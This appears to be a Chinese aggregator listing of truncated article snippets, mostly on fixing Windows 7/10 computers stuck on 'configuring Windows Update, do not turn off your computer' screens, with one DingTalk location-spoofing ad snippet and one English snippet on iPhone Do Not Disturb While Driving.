2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57